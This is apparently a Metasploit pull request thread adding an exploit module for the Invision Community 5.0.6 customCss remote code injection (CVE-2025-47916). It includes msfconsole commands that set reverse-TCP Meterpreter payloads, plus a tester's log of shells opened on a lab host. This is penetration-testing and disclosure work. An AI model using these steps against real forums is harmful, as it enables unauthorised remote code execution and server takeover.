Add Invision Community 5.0.6 customCss RCE (CVE-2025-47916)

[Chocapikk]

Hello Metasploit team,

This pull request adds a new exploit module for Invision Community versions up to and including 5.0.6, which is vulnerable to a remote-code injection in the theme editor’s customCss endpoint (CVE-2025-47916). The module leverages the malformed {expression="…"} construct to evaluate arbitrary PHP expressions and supports both in-memory PHP payloads and direct system command execution.

Implements

• exploit/multi/http/invision_customcss_rce.rb
• check method that fetches /admin/install/eula.txt and parses the IPS version
• Payload wrapper using phped_payload = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)
• Support for PHP meterpreter in-memory payloads (ARCH_PHP) and system commands (ARCH_CMD)
• Module metadata: authors, references (including CVE-2025-47916), disclosure date, notes

Verification

• Start msfconsole
• use exploit/multi/http/invision_customcss_rce
• Check vulnerability: check
  • Expect "Detected IPS version: 5.0.6" and "is vulnerable"
• Exploit with PHP meterpreter:

  use exploit/multi/http/invision_customcss_rce
  set TARGET 0
  set PAYLOAD php/meterpreter/reverse_tcp
  run http://localhost:7777

  • Verify a Meterpreter session opens and sysinfo returns host info
• Exploit with command shell:

  set TARGET 1
  set payload cmd/linux/http/x64/meterpreter_reverse_tcp
  run http://localhost:7777

  • Verify a Meterpreter session opens and sysinfo returns host info
• Document usage and background in documentation/modules/exploits/multi/http/invision_customcss_rce.md

Note: For testing purposes I have temporarily copy-and-pasted the php_exec_cmd helper into this module; it will be removed once PR #20160 is merged.

cc: @jvoisin

[jheysel-r7]

Thanks for the module @Chocapikk. Looks great, testing was as expected.

Testing

php/meterpreter/reverse_tcp

msf6 exploit(multi/http/invision_customcss_rce) > run rhost=127.0.0.1 rport=7777 lhost=172.16.199.1
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Detected IPS version: 5.0.6
[+] The target is vulnerable. IPS version 5.0.6 is vulnerable (≤ 5.0.6)
[*] Sending exploit to 127.0.0.1:7777 ...
[*] Sending stage (40004 bytes) to 172.16.199.1
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.1:58613) at 2025-05-20 19:01:56 -0700

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : d4a8dc0393fe
OS          : Linux d4a8dc0393fe 6.10.14-linuxkit #1 SMP PREEMPT_DYNAMIC Tue Apr 15 16:05:22 UTC 2025 x86_64
Meterpreter : php/linux

cmd/linux/http/x64/meterpreter_reverse_tcp

msf6 exploit(multi/http/invision_customcss_rce) > run rhost=127.0.0.1 rport=7777 lhost=172.16.199.1
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Detected IPS version: 5.0.6
[+] The target is vulnerable. IPS version 5.0.6 is vulnerable (≤ 5.0.6)
[*] Sending exploit to 127.0.0.1:7777 ...
[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.1:58637) at 2025-05-20 19:04:08 -0700


meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer     : 172.25.0.3
OS           : Debian 12.10 (Linux 6.10.14-linuxkit)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

[jheysel-r7]

Release Notes

This adds a new exploit module for Invision Community versions up to and including 5.0.6, which is vulnerable to a remote-code injection in the theme editor’s customCss endpoint CVE-2025-47916. The module leverages the malformed {expression="…"} construct to evaluate arbitrary PHP expressions and supports both in-memory PHP payloads and direct system command execution.